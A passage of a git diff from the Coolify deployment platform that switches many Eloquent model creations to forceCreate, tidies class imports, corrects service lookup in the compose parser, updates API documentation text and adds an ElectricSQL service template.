                     'pull_request_id' => $this->pullRequestId,
@@ -127,7 +127,7 @@ private function handleOpenAction(Application $application, ?GithubApp $githubAp
                 ]);
                 $preview->generate_preview_fqdn_compose();
             } else {
-                $preview = ApplicationPreview::create([
+                $preview = ApplicationPreview::forceCreate([
                     'git_type' => 'github',
                     'application_id' => $application->id,
                     'pull_request_id' => $this->pullRequestId,
diff --git a/app/Livewire/Boarding/Index.php b/app/Livewire/Boarding/Index.php
index 7e1121860..170f0cdea 100644
--- a/app/Livewire/Boarding/Index.php
+++ b/app/Livewire/Boarding/Index.php
@@ -9,6 +9,7 @@
 use App\Models\Team;
 use App\Services\ConfigurationRepository;
 use Illuminate\Support\Collection;
+use Livewire\Attributes\Url;
 use Livewire\Component;
 use Visus\Cuid2\Cuid2;
 
@@ -19,18 +20,18 @@ class Index extends Component
         'prerequisitesInstalled' => 'handlePrerequisitesInstalled',
     ];
 
-    #[\Livewire\Attributes\Url(as: 'step', history: true)]
+    #[Url(as: 'step', history: true)]
     public string $currentState = 'welcome';
 
-    #[\Livewire\Attributes\Url(keep: true)]
+    #[Url(keep: true)]
     public ?string $selectedServerType = null;
 
     public ?Collection $privateKeys = null;
 
-    #[\Livewire\Attributes\Url(keep: true)]
+    #[Url(keep: true)]
     public ?int $selectedExistingPrivateKey = null;
 
-    #[\Livewire\Attributes\Url(keep: true)]
+    #[Url(keep: true)]
     public ?string $privateKeyType = null;
 
     public ?string $privateKey = null;
@@ -45,7 +46,7 @@ class Index extends Component
 
     public ?Collection $servers = null;
 
-    #[\Livewire\Attributes\Url(keep: true)]
+    #[Url(keep: true)]
     public ?int $selectedExistingServer = null;
 
     public ?string $remoteServerName = null;
@@ -66,7 +67,7 @@ class Index extends Component
 
     public Collection $projects;
 
-    #[\Livewire\Attributes\Url(keep: true)]
+    #[Url(keep: true)]
     public ?int $selectedProject = null;
 
     public ?Project $createdProject = null;
@@ -440,7 +441,7 @@ public function selectExistingProject()
 
     public function createNewProject()
     {
-        $this->createdProject = Project::create([
+        $this->createdProject = Project::forceCreate([
             'name' => 'My first project',
             'team_id' => currentTeam()->id,
             'uuid' => (string) new Cuid2,
diff --git a/app/Livewire/Destination/New/Docker.php b/app/Livewire/Destination/New/Docker.php
index 5c1b178d7..141235590 100644
--- a/app/Livewire/Destination/New/Docker.php
+++ b/app/Livewire/Destination/New/Docker.php
@@ -5,7 +5,6 @@
 use App\Models\Server;
 use App\Models\StandaloneDocker;
 use App\Models\SwarmDocker;
-use App\Support\ValidationPatterns;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
 use Livewire\Attributes\Locked;
 use Livewire\Attributes\Validate;
@@ -78,7 +77,7 @@ public function submit()
                 if ($found) {
                     throw new \Exception('Network already added to this server.');
                 } else {
-                    $docker = SwarmDocker::create([
+                    $docker = SwarmDocker::forceCreate([
                         'name' => $this->name,
                         'network' => $this->network,
                         'server_id' => $this->selectedServer->id,
@@ -89,7 +88,7 @@ public function submit()
                 if ($found) {
                     throw new \Exception('Network already added to this server.');
                 } else {
-                    $docker = StandaloneDocker::create([
+                    $docker = StandaloneDocker::forceCreate([
                         'name' => $this->name,
                         'network' => $this->network,
                         'server_id' => $this->selectedServer->id,
diff --git a/app/Livewire/Project/AddEmpty.php b/app/Livewire/Project/AddEmpty.php
index 974f0608a..a2581a5c9 100644
--- a/app/Livewire/Project/AddEmpty.php
+++ b/app/Livewire/Project/AddEmpty.php
@@ -30,7 +30,7 @@ public function submit()
     {
         try {
             $this->validate();
-            $project = Project::create([
+            $project = Project::forceCreate([
                 'name' => $this->name,
                 'description' => $this->description,
                 'team_id' => currentTeam()->id,
diff --git a/app/Livewire/Project/Application/Previews.php b/app/Livewire/Project/Application/Previews.php
index 41f352c14..576df8589 100644
--- a/app/Livewire/Project/Application/Previews.php
+++ b/app/Livewire/Project/Application/Previews.php
@@ -182,7 +182,7 @@ public function add(int $pull_request_id, ?string $pull_request_html_url = null)
                 $this->setDeploymentUuid();
                 $found = ApplicationPreview::where('application_id', $this->application->id)->where('pull_request_id', $pull_request_id)->first();
                 if (! $found && ! is_null($pull_request_html_url)) {
-                    $found = ApplicationPreview::create([
+                    $found = ApplicationPreview::forceCreate([
                         'application_id' => $this->application->id,
                         'pull_request_id' => $pull_request_id,
                         'pull_request_html_url' => $pull_request_html_url,
@@ -196,7 +196,7 @@ public function add(int $pull_request_id, ?string $pull_request_html_url = null)
                 $this->setDeploymentUuid();
                 $found = ApplicationPreview::where('application_id', $this->application->id)->where('pull_request_id', $pull_request_id)->first();
                 if (! $found && ! is_null($pull_request_html_url)) {
-                    $found = ApplicationPreview::create([
+                    $found = ApplicationPreview::forceCreate([
                         'application_id' => $this->application->id,
                         'pull_request_id' => $pull_request_id,
                         'pull_request_html_url' => $pull_request_html_url,
@@ -236,7 +236,7 @@ public function deploy(int $pull_request_id, ?string $pull_request_html_url = nu
             $this->setDeploymentUuid();
             $found = ApplicationPreview::where('application_id', $this->application->id)->where('pull_request_id', $pull_request_id)->first();
             if (! $found && ! is_null($pull_request_html_url)) {
-                ApplicationPreview::create([
+                ApplicationPreview::forceCreate([
                     'application_id' => $this->application->id,
                     'pull_request_id' => $pull_request_id,
                     'pull_request_html_url' => $pull_request_html_url,
diff --git a/app/Livewire/Project/CloneMe.php b/app/Livewire/Project/CloneMe.php
index e236124e9..93eb2a78c 100644
--- a/app/Livewire/Project/CloneMe.php
+++ b/app/Livewire/Project/CloneMe.php
@@ -100,7 +100,7 @@ public function clone(string $type)
                 if ($foundProject) {
                     throw new \Exception('Project with the same name already exists.');
                 }
-                $project = Project::create([
+                $project = Project::forceCreate([
                     'name' => $this->newName,
                     'team_id' => currentTeam()->id,
                     'description' => $this->project->description.' (clone)',
diff --git a/app/Livewire/Project/New/DockerCompose.php b/app/Livewire/Project/New/DockerCompose.php
index 2b92902c6..99fb2efc4 100644
--- a/app/Livewire/Project/New/DockerCompose.php
+++ b/app/Livewire/Project/New/DockerCompose.php
@@ -54,7 +54,7 @@ public function submit()
             }
             $destination_class = $destination->getMorphClass();
 
-            $service = Service::create([
+            $service = Service::forceCreate([
                 'docker_compose_raw' => $this->dockerComposeRaw,
                 'environment_id' => $environment->id,
                 'server_id' => (int) $server_id,
diff --git a/app/Livewire/Project/New/DockerImage.php b/app/Livewire/Project/New/DockerImage.php
index 268333d07..8becdf585 100644
--- a/app/Livewire/Project/New/DockerImage.php
+++ b/app/Livewire/Project/New/DockerImage.php
@@ -133,7 +133,7 @@ public function submit()
         // Determine the image tag based on whether it's a hash or regular tag
         $imageTag = $parser->isImageHash() ? 'sha256-'.$parser->getTag() : $parser->getTag();
 
-        $application = Application::create([
+        $application = Application::forceCreate([
             'name' => 'docker-image-'.new Cuid2,
             'repository_project_id' => 0,
             'git_repository' => 'coollabsio/coolify',
diff --git a/app/Livewire/Project/New/EmptyProject.php b/app/Livewire/Project/New/EmptyProject.php
index 0360365a9..1cdc7e098 100644
--- a/app/Livewire/Project/New/EmptyProject.php
+++ b/app/Livewire/Project/New/EmptyProject.php
@@ -10,7 +10,7 @@ class EmptyProject extends Component
 {
     public function createEmptyProject()
     {
-        $project = Project::create([
+        $project = Project::forceCreate([
             'name' => generate_random_name(),
             'team_id' => currentTeam()->id,
             'uuid' => (string) new Cuid2,
diff --git a/app/Livewire/Project/New/GithubPrivateRepository.php b/app/Livewire/Project/New/GithubPrivateRepository.php
index 86424642d..6aa8db085 100644
--- a/app/Livewire/Project/New/GithubPrivateRepository.php
+++ b/app/Livewire/Project/New/GithubPrivateRepository.php
@@ -8,6 +8,7 @@
 use App\Models\StandaloneDocker;
 use App\Models\SwarmDocker;
 use App\Rules\ValidGitBranch;
+use App\Support\ValidationPatterns;
 use Illuminate\Support\Facades\Http;
 use Illuminate\Support\Facades\Route;
 use Livewire\Component;
@@ -168,7 +169,7 @@ public function submit()
                 'selected_repository_owner' => 'required|string|regex:/^[a-zA-Z0-9\-_]+$/',
                 'selected_repository_repo' => 'required|string|regex:/^[a-zA-Z0-9\-_\.]+$/',
                 'selected_branch_name' => ['required', 'string', new ValidGitBranch],
-                'docker_compose_location' => \App\Support\ValidationPatterns::filePathRules(),
+                'docker_compose_location' => ValidationPatterns::filePathRules(),
             ]);
 
             if ($validator->fails()) {
@@ -188,7 +189,7 @@ public function submit()
             $project = Project::ownedByCurrentTeam()->where('uuid', $this->parameters['project_uuid'])->firstOrFail();
             $environment = $project->environments()->where('uuid', $this->parameters['environment_uuid'])->firstOrFail();
 
-            $application = Application::create([
+            $application = Application::forceCreate([
                 'name' => generate_application_name($this->selected_repository_owner.'/'.$this->selected_repository_repo, $this->selected_branch_name),
                 'repository_project_id' => $this->selected_repository_id,
                 'git_repository' => str($this->selected_repository_owner)->trim()->toString().'/'.str($this->selected_repository_repo)->trim()->toString(),
diff --git a/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php b/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php
index 94ef23cc9..ba058c6ff 100644
--- a/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php
+++ b/app/Livewire/Project/New/GithubPrivateRepositoryDeployKey.php
@@ -11,6 +11,7 @@
 use App\Models\SwarmDocker;
 use App\Rules\ValidGitBranch;
 use App\Rules\ValidGitRepositoryUrl;
+use App\Support\ValidationPatterns;
 use Illuminate\Support\Str;
 use Livewire\Component;
 use Spatie\Url\Url;
@@ -66,7 +67,7 @@ protected function rules()
             'is_static' => 'required|boolean',
             'publish_directory' => 'nullable|string',
             'build_pack' => 'required|string',
-            'docker_compose_location' => \App\Support\ValidationPatterns::filePathRules(),
+            'docker_compose_location' => ValidationPatterns::filePathRules(),
         ];
     }
 
@@ -182,7 +183,7 @@ public function submit()
                 $application_init['docker_compose_location'] = $this->docker_compose_location;
                 $application_init['base_directory'] = $this->base_directory;
             }
-            $application = Application::create($application_init);
+            $application = Application::forceCreate($application_init);
             $application->settings->is_static = $this->is_static;
             $application->settings->save();
 
diff --git a/app/Livewire/Project/New/PublicGitRepository.php b/app/Livewire/Project/New/PublicGitRepository.php
index 9c9ddb8ce..6bd71d246 100644
--- a/app/Livewire/Project/New/PublicGitRepository.php
+++ b/app/Livewire/Project/New/PublicGitRepository.php
@@ -11,6 +11,7 @@
 use App\Models\SwarmDocker;
 use App\Rules\ValidGitBranch;
 use App\Rules\ValidGitRepositoryUrl;
+use App\Support\ValidationPatterns;
 use Carbon\Carbon;
 use Livewire\Component;
 use Spatie\Url\Url;
@@ -72,7 +73,7 @@ protected function rules()
             'publish_directory' => 'nullable|string',
             'build_pack' => 'required|string',
             'base_directory' => 'nullable|string',
-            'docker_compose_location' => \App\Support\ValidationPatterns::filePathRules(),
+            'docker_compose_location' => ValidationPatterns::filePathRules(),
             'git_branch' => ['required', 'string', new ValidGitBranch],
         ];
     }
@@ -233,7 +234,7 @@ private function getBranch()
 
             return;
         }
-        if ($this->git_source->getMorphClass() === \App\Models\GithubApp::class) {
+        if ($this->git_source->getMorphClass() === GithubApp::class) {
             ['rate_limit_remaining' => $this->rate_limit_remaining, 'rate_limit_reset' => $this->rate_limit_reset] = githubApi(source: $this->git_source, endpoint: "/repos/{$this->git_repository}/branches/{$this->git_branch}");
             $this->rate_limit_reset = Carbon::parse((int) $this->rate_limit_reset)->format('Y-M-d H:i:s');
             $this->branchFound = true;
@@ -298,7 +299,7 @@ public function submit()
                     $new_service['source_id'] = $this->git_source->id;
                     $new_service['source_type'] = $this->git_source->getMorphClass();
                 }
-                $service = Service::create($new_service);
+                $service = Service::forceCreate($new_service);
 
                 return redirect()->route('project.service.configuration', [
                     'service_uuid' => $service->uuid,
@@ -345,7 +346,7 @@ public function submit()
                 $application_init['docker_compose_location'] = $this->docker_compose_location;
                 $application_init['base_directory'] = $this->base_directory;
             }
-            $application = Application::create($application_init);
+            $application = Application::forceCreate($application_init);
 
             $application->settings->is_static = $this->isStatic;
             $application->settings->save();
diff --git a/app/Livewire/Project/New/SimpleDockerfile.php b/app/Livewire/Project/New/SimpleDockerfile.php
index 1073157e6..400b58fea 100644
--- a/app/Livewire/Project/New/SimpleDockerfile.php
+++ b/app/Livewire/Project/New/SimpleDockerfile.php
@@ -52,7 +52,7 @@ public function submit()
         if (! $port) {
             $port = 80;
         }
-        $application = Application::create([
+        $application = Application::forceCreate([
             'name' => 'dockerfile-'.new Cuid2,
             'repository_project_id' => 0,
             'git_repository' => 'coollabsio/coolify',
diff --git a/app/Livewire/Project/Resource/Create.php b/app/Livewire/Project/Resource/Create.php
index 966c66a14..dbe56b079 100644
--- a/app/Livewire/Project/Resource/Create.php
+++ b/app/Livewire/Project/Resource/Create.php
@@ -91,7 +91,7 @@ public function mount()
                     if (in_array($oneClickServiceName, NEEDS_TO_CONNECT_TO_PREDEFINED_NETWORK)) {
                         data_set($service_payload, 'connect_to_docker_network', true);
                     }
-                    $service = Service::create($service_payload);
+                    $service = Service::forceCreate($service_payload);
                     $service->name = "$oneClickServiceName-".$service->uuid;
                     $service->save();
                     if ($oneClickDotEnvs?->count() > 0) {
diff --git a/app/Livewire/Project/Show.php b/app/Livewire/Project/Show.php
index e884abb4e..b9628dd0d 100644
--- a/app/Livewire/Project/Show.php
+++ b/app/Livewire/Project/Show.php
@@ -42,7 +42,7 @@ public function submit()
     {
         try {
             $this->validate();
-            $environment = Environment::create([
+            $environment = Environment::forceCreate([
                 'name' => $this->name,
                 'project_id' => $this->project->id,
                 'uuid' => (string) new Cuid2,
diff --git a/app/Livewire/Server/Destinations.php b/app/Livewire/Server/Destinations.php
index 117b43ad6..f41ca00f3 100644
--- a/app/Livewire/Server/Destinations.php
+++ b/app/Livewire/Server/Destinations.php
@@ -43,7 +43,7 @@ public function add($name)
 
                 return;
             } else {
-                SwarmDocker::create([
+                SwarmDocker::forceCreate([
                     'name' => $this->server->name.'-'.$name,
                     'network' => $this->name,
                     'server_id' => $this->server->id,
@@ -57,7 +57,7 @@ public function add($name)
 
                 return;
             } else {
-                StandaloneDocker::create([
+                StandaloneDocker::forceCreate([
                     'name' => $this->server->name.'-'.$name,
                     'network' => $name,
                     'server_id' => $this->server->id,
diff --git a/app/Livewire/SettingsBackup.php b/app/Livewire/SettingsBackup.php
index 84f5c6081..a111a6096 100644
--- a/app/Livewire/SettingsBackup.php
+++ b/app/Livewire/SettingsBackup.php
@@ -6,6 +6,7 @@
 use App\Models\S3Storage;
 use App\Models\ScheduledDatabaseBackup;
 use App\Models\Server;
+use App\Models\StandaloneDocker;
 use App\Models\StandalonePostgresql;
 use Livewire\Attributes\Locked;
 use Livewire\Attributes\Validate;
@@ -82,7 +83,7 @@ public function addCoolifyDatabase()
             $postgres_password = $envs['POSTGRES_PASSWORD'];
             $postgres_user = $envs['POSTGRES_USER'];
             $postgres_db = $envs['POSTGRES_DB'];
-            $this->database = StandalonePostgresql::create([
+            $this->database = StandalonePostgresql::forceCreate([
                 'id' => 0,
                 'name' => 'coolify-db',
                 'description' => 'Coolify database',
@@ -90,7 +91,7 @@ public function addCoolifyDatabase()
                 'postgres_password' => $postgres_password,
                 'postgres_db' => $postgres_db,
                 'status' => 'running',
-                'destination_type' => \App\Models\StandaloneDocker::class,
+                'destination_type' => StandaloneDocker::class,
                 'destination_id' => 0,
             ]);
             $this->backup = ScheduledDatabaseBackup::create([
@@ -99,7 +100,7 @@ public function addCoolifyDatabase()
                 'save_s3' => false,
                 'frequency' => '0 0 * * *',
                 'database_id' => $this->database->id,
-                'database_type' => \App\Models\StandalonePostgresql::class,
+                'database_type' => StandalonePostgresql::class,
                 'team_id' => currentTeam()->id,
             ]);
             $this->database->refresh();
diff --git a/app/Models/Application.php b/app/Models/Application.php
index 3312f4c76..018bfd421 100644
--- a/app/Models/Application.php
+++ b/app/Models/Application.php
@@ -299,7 +299,7 @@ protected static function booted()
             }
         });
         static::created(function ($application) {
-            ApplicationSetting::create([
+            ApplicationSetting::forceCreate([
                 'application_id' => $application->id,
             ]);
             $application->compose_parsing_version = self::$parserVersion;
diff --git a/app/Models/Project.php b/app/Models/Project.php
index eca5440ef..ff2cae041 100644
--- a/app/Models/Project.php
+++ b/app/Models/Project.php
@@ -51,10 +51,10 @@ public static function ownedByCurrentTeamCached()
     protected static function booted()
     {
         static::created(function ($project) {
-            ProjectSetting::create([
+            ProjectSetting::forceCreate([
                 'project_id' => $project->id,
             ]);
-            Environment::create([
+            Environment::forceCreate([
                 'name' => 'production',
                 'project_id' => $project->id,
                 'uuid' => (string) new Cuid2,
diff --git a/app/Models/Server.php b/app/Models/Server.php
index f5ac0bd45..427896a19 100644
--- a/app/Models/Server.php
+++ b/app/Models/Server.php
@@ -143,19 +143,19 @@ protected static function booted()
             }
         });
         static::created(function ($server) {
-            ServerSetting::create([
+            ServerSetting::forceCreate([
                 'server_id' => $server->id,
             ]);
             if ($server->id === 0) {
                 if ($server->isSwarm()) {
-                    SwarmDocker::create([
+                    SwarmDocker::forceCreate([
                         'id' => 0,
                         'name' => 'coolify',
                         'network' => 'coolify-overlay',
                         'server_id' => $server->id,
                     ]);
                 } else {
-                    StandaloneDocker::create([
+                    StandaloneDocker::forceCreate([
                         'id' => 0,
                         'name' => 'coolify',
                         'network' => 'coolify',
@@ -164,13 +164,14 @@ protected static function booted()
                 }
             } else {
                 if ($server->isSwarm()) {
-                    SwarmDocker::create([
+                    SwarmDocker::forceCreate([
                         'name' => 'coolify-overlay',
                         'network' => 'coolify-overlay',
                         'server_id' => $server->id,
                     ]);
                 } else {
-                    $standaloneDocker = new StandaloneDocker([
+                    $standaloneDocker = new StandaloneDocker;
+                    $standaloneDocker->forceFill([
                         'name' => 'coolify',
                         'uuid' => (string) new Cuid2,
                         'network' => 'coolify',
diff --git a/bootstrap/helpers/parsers.php b/bootstrap/helpers/parsers.php
index 4ca693fcb..751851283 100644
--- a/bootstrap/helpers/parsers.php
+++ b/bootstrap/helpers/parsers.php
@@ -22,25 +22,25 @@
  *
  * @param  string  $composeYaml  The raw Docker Compose YAML content
  *
- * @throws \Exception If the compose file contains command injection attempts
+ * @throws Exception If the compose file contains command injection attempts
  */
 function validateDockerComposeForInjection(string $composeYaml): void
 {
     try {
         $parsed = Yaml::parse($composeYaml);
-    } catch (\Exception $e) {
-        throw new \Exception('Invalid YAML format: '.$e->getMessage(), 0, $e);
+    } catch (Exception $e) {
+        throw new Exception('Invalid YAML format: '.$e->getMessage(), 0, $e);
     }
 
     if (! is_array($parsed) || ! isset($parsed['services']) || ! is_array($parsed['services'])) {
-        throw new \Exception('Docker Compose file must contain a "services" section');
+        throw new Exception('Docker Compose file must contain a "services" section');
     }
     // Validate service names
     foreach ($parsed['services'] as $serviceName => $serviceConfig) {
         try {
             validateShellSafePath($serviceName, 'service name');
-        } catch (\Exception $e) {
-            throw new \Exception(
+        } catch (Exception $e) {
+            throw new Exception(
                 'Invalid Docker Compose service name: '.$e->getMessage().
                 ' Service names must not contain shell metacharacters.',
                 0,
@@ -68,8 +68,8 @@ function validateDockerComposeForInjection(string $composeYaml): void
                             if (! $isSimpleEnvVar && ! $isEnvVarWithDefault && ! $isEnvVarWithPath) {
                                 try {
                                     validateShellSafePath($source, 'volume source');
-                                } catch (\Exception $e) {
-                                    throw new \Exception(
+                                } catch (Exception $e) {
+                                    throw new Exception(
                                         'Invalid Docker volume definition (array syntax): '.$e->getMessage().
                                         ' Please use safe path names without shell metacharacters.',
                                         0,
@@ -84,8 +84,8 @@ function validateDockerComposeForInjection(string $composeYaml): void
                         if (is_string($target)) {
                             try {
                                 validateShellSafePath($target, 'volume target');
-                            } catch (\Exception $e) {
-                                throw new \Exception(
+                            } catch (Exception $e) {
+                                throw new Exception(
                                     'Invalid Docker volume definition (array syntax): '.$e->getMessage().
                                     ' Please use safe path names without shell metacharacters.',
                                     0,
@@ -105,7 +105,7 @@ function validateDockerComposeForInjection(string $composeYaml): void
  *
  * @param  string  $volumeString  The volume string to validate
  *
- * @throws \Exception If the volume string contains command injection attempts
+ * @throws Exception If the volume string contains command injection attempts
  */
 function validateVolumeStringForInjection(string $volumeString): void
 {
@@ -325,9 +325,9 @@ function parseDockerVolumeString(string $volumeString): array
         if (! $isSimpleEnvVar && ! $isEnvVarWithPath) {
             try {
                 validateShellSafePath($sourceStr, 'volume source');
-            } catch (\Exception $e) {
+            } catch (Exception $e) {
                 // Re-throw with more context about the volume string
-                throw new \Exception(
+                throw new Exception(
                     'Invalid Docker volume definition: '.$e->getMessage().
                     ' Please use safe path names without shell metacharacters.'
                 );
@@ -343,8 +343,8 @@ function parseDockerVolumeString(string $volumeString): array
         // Still, defense in depth is important
         try {
             validateShellSafePath($targetStr, 'volume target');
-        } catch (\Exception $e) {
-            throw new \Exception(
+        } catch (Exception $e) {
+            throw new Exception(
                 'Invalid Docker volume definition: '.$e->getMessage().
                 ' Please use safe path names without shell metacharacters.'
             );
@@ -375,7 +375,7 @@ function applicationParser(Application $resource, int $pull_request_id = 0, ?int
 
     try {
         $yaml = Yaml::parse($compose);
-    } catch (\Exception) {
+    } catch (Exception) {
         return collect([]);
     }
     $services = data_get($yaml, 'services', collect([]));
@@ -409,8 +409,8 @@ function applicationParser(Application $resource, int $pull_request_id = 0, ?int
         // Validate service name for command injection
         try {
             validateShellSafePath($serviceName, 'service name');
-        } catch (\Exception $e) {
-            throw new \Exception(
+        } catch (Exception $e) {
+            throw new Exception(
                 'Invalid Docker Compose service name: '.$e->getMessage().
                 ' Service names must not contain shell metacharacters.'
             );
@@ -465,7 +465,7 @@ function applicationParser(Application $resource, int $pull_request_id = 0, ?int
                     $fqdn = generateFqdn(server: $server, random: "$uuid", parserVersion: $resource->compose_parsing_version);
                 }
 
-                if ($value && get_class($value) === \Illuminate\Support\Stringable::class && $value->startsWith('/')) {
+                if ($value && get_class($value) === Illuminate\Support\Stringable::class && $value->startsWith('/')) {
                     $path = $value->value();
                     if ($path !== '/') {
                         $fqdn = "$fqdn$path";
@@ -738,8 +738,8 @@ function applicationParser(Application $resource, int $pull_request_id = 0, ?int
                         if (! $isSimpleEnvVar && ! $isEnvVarWithDefault && ! $isEnvVarWithPath) {
                             try {
                                 validateShellSafePath($sourceValue, 'volume source');
-                            } catch (\Exception $e) {
-                                throw new \Exception(
+                            } catch (Exception $e) {
+                                throw new Exception(
                                     'Invalid Docker volume definition (array syntax): '.$e->getMessage().
                                     ' Please use safe path names without shell metacharacters.'
                                 );
@@ -749,8 +749,8 @@ function applicationParser(Application $resource, int $pull_request_id = 0, ?int
                     if ($target !== null && ! empty($target->value())) {
                         try {
                             validateShellSafePath($target->value(), 'volume target');
-                        } catch (\Exception $e) {
-                            throw new \Exception(
+                        } catch (Exception $e) {
+                            throw new Exception(
                                 'Invalid Docker volume definition (array syntax): '.$e->getMessage().
                                 ' Please use safe path names without shell metacharacters.'
                             );
@@ -1489,7 +1489,7 @@ function applicationParser(Application $resource, int $pull_request_id = 0, ?int
             }
         }
         $resource->docker_compose_raw = Yaml::dump($originalYaml, 10, 2);
-    } catch (\Exception $e) {
+    } catch (Exception $e) {
         // If parsing fails, keep the original docker_compose_raw unchanged
         ray('Failed to update docker_compose_raw in applicationParser: '.$e->getMessage());
     }
@@ -1519,7 +1519,7 @@ function serviceParser(Service $resource): Collection
 
     try {
         $yaml = Yaml::parse($compose);
-    } catch (\Exception) {
+    } catch (Exception) {
         return collect([]);
     }
     $services = data_get($yaml, 'services', collect([]));
@@ -1566,8 +1566,8 @@ function serviceParser(Service $resource): Collection
         // Validate service name for command injection
         try {
             validateShellSafePath($serviceName, 'service name');
-        } catch (\Exception $e) {
-            throw new \Exception(
+        } catch (Exception $e) {
+            throw new Exception(
                 'Invalid Docker Compose service name: '.$e->getMessage().
                 ' Service names must not contain shell metacharacters.'
             );
@@ -1593,20 +1593,25 @@ function serviceParser(Service $resource): Collection
             // Use image detection for non-migrated services
             $isDatabase = isDatabaseImage($image, $service);
             if ($isDatabase) {
-                $applicationFound = ServiceApplication::where('name', $serviceName)->where('service_id', $resource->id)->first();
-                if ($applicationFound) {
-                    $savedService = $applicationFound;
+                $databaseFound = ServiceDatabase::where('name', $serviceName)->where('service_id', $resource->id)->first();
+                if ($databaseFound) {
+                    $savedService = $databaseFound;
                 } else {
-                    $savedService = ServiceDatabase::firstOrCreate([
+                    $savedService = ServiceDatabase::forceCreate([
                         'name' => $serviceName,
                         'service_id' => $resource->id,
                     ]);
                 }
             } else {
-                $savedService = ServiceApplication::firstOrCreate([
-                    'name' => $serviceName,
-                    'service_id' => $resource->id,
-                ]);
+                $applicationFound = ServiceApplication::where('name', $serviceName)->where('service_id', $resource->id)->first();
+                if ($applicationFound) {
+                    $savedService = $applicationFound;
+                } else {
+                    $savedService = ServiceApplication::forceCreate([
+                        'name' => $serviceName,
+                        'service_id' => $resource->id,
+                    ]);
+                }
             }
         }
         // Update image if it changed
@@ -1772,7 +1777,7 @@ function serviceParser(Service $resource): Collection
                 // Strip scheme for environment variable values
                 $fqdnValueForEnv = str($fqdn)->after('://')->value();
 
-                if ($value && get_class($value) === \Illuminate\Support\Stringable::class && $value->startsWith('/')) {
+                if ($value && get_class($value) === Illuminate\Support\Stringable::class && $value->startsWith('/')) {
                     $path = $value->value();
                     if ($path !== '/') {
                         // Only add path if it's not already present (prevents duplication on subsequent parse() calls)
@@ -2120,8 +2125,8 @@ function serviceParser(Service $resource): Collection
                         if (! $isSimpleEnvVar && ! $isEnvVarWithDefault && ! $isEnvVarWithPath) {
                             try {
                                 validateShellSafePath($sourceValue, 'volume source');
-                            } catch (\Exception $e) {
-                                throw new \Exception(
+                            } catch (Exception $e) {
+                                throw new Exception(
                                     'Invalid Docker volume definition (array syntax): '.$e->getMessage().
                                     ' Please use safe path names without shell metacharacters.'
                                 );
@@ -2131,8 +2136,8 @@ function serviceParser(Service $resource): Collection
                     if ($target !== null && ! empty($target->value())) {
                         try {
                             validateShellSafePath($target->value(), 'volume target');
-                        } catch (\Exception $e) {
-                            throw new \Exception(
+                        } catch (Exception $e) {
+                            throw new Exception(
                                 'Invalid Docker volume definition (array syntax): '.$e->getMessage().
                                 ' Please use safe path names without shell metacharacters.'
                             );
@@ -2741,7 +2746,7 @@ function serviceParser(Service $resource): Collection
             }
         }
         $resource->docker_compose_raw = Yaml::dump($originalYaml, 10, 2);
-    } catch (\Exception $e) {
+    } catch (Exception $e) {
         // If parsing fails, keep the original docker_compose_raw unchanged
         ray('Failed to update docker_compose_raw in serviceParser: '.$e->getMessage());
     }
diff --git a/openapi.json b/openapi.json
index 277f485f9..a43134dc7 100644
--- a/openapi.json
+++ b/openapi.json
@@ -2722,8 +2722,7 @@
                                     },
                                     "is_preserve_repository_enabled": {
                                         "type": "boolean",
-                                        "default": false,
-                                        "description": "Preserve repository during deployment."
+                                        "description": "Preserve git repository during application update. If false, the existing repository will be removed and replaced with the new one. If true, the existing repository will be kept and the new one will be ignored. Default is false."
                                     }
                                 },
                                 "type": "object"
diff --git a/openapi.yaml b/openapi.yaml
index 9475364b6..7baab40a8 100644
--- a/openapi.yaml
+++ b/openapi.yaml
@@ -1755,8 +1755,7 @@ paths:
                   description: 'Escape special characters in labels. By default, $ (and other chars) is escaped. So if you write $ in the labels, it will be saved as $$. If you want to use env variables inside the labels, turn this off.'
                 is_preserve_repository_enabled:
                   type: boolean
-                  default: false
-                  description: 'Preserve repository during deployment.'
+                  description: 'Preserve git repository during application update. If false, the existing repository will be removed and replaced with the new one. If true, the existing repository will be kept and the new one will be ignored. Default is false.'
               type: object
       responses:
         '200':
diff --git a/templates/service-templates-latest.json b/templates/service-templates-latest.json
index 51cb39de0..590d0ab64 100644
--- a/templates/service-templates-latest.json
+++ b/templates/service-templates-latest.json
@@ -1102,6 +1102,22 @@
         "minversion": "0.0.0",
         "port": "9200"
     },
+    "electricsql": {
+        "documentation": "https://electric-sql.com/docs/guides/deployment?utm_source=coolify.io",
+        "slogan": "Sync shape-based subsets of your Postgres data over HTTP.",
+        "compose": "c2VydmljZXM6CiAgZWxlY3RyaWM6CiAgICBpbWFnZTogJ2VsZWN0cmljc3FsL2VsZWN0cmljOjEuNC4yJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfRUxFQ1RSSUNfMzAwMAogICAgICAtICdEQVRBQkFTRV9VUkw9JHtEQVRBQkFTRV9VUkw6P30nCiAgICAgIC0gJ0VMRUNUUklDX1NFQ1JFVD0ke1NFUlZJQ0VfUEFTU1dPUkRfNjRfRUxFQ1RSSUN9JwogICAgICAtIEVMRUNUUklDX1NUT1JBR0VfRElSPS9hcHAvcGVyc2lzdGVudAogICAgICAtICdFTEVDVFJJQ19VU0FHRV9SRVBPUlRJTkc9JHtFTEVDVFJJQ19VU0FHRV9SRVBPUlRJTkc6LWZhbHNlfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2VsZWN0cmljX2RhdGE6L2FwcC9wZXJzaXN0ZW50JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGN1cmwKICAgICAgICAtICctZicKICAgICAgICAtICdodHRwOi8vMTI3LjAuMC4xOjMwMDAvdjEvaGVhbHRoJwogICAgICBpbnRlcnZhbDogMTBzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDUK",
+        "tags": [
+            "electric",
+            "electricsql",
+            "realtime",
+            "sync",
+            "postgresql"
+        ],
+        "category": "backend",
+        "logo": "svgs/electricsql.svg",
+        "minversion": "0.0.0",
+        "port": "3000"
+    },
     "emby": {
         "documentation": "https://emby.media/support/articles/Home.html?utm_source=coolify.io",
         "slogan": "A media server software that allows you to organize, stream, and access your multimedia content effortlessly.",
@@ -1847,7 +1863,7 @@
     "grafana-with-postgresql": {
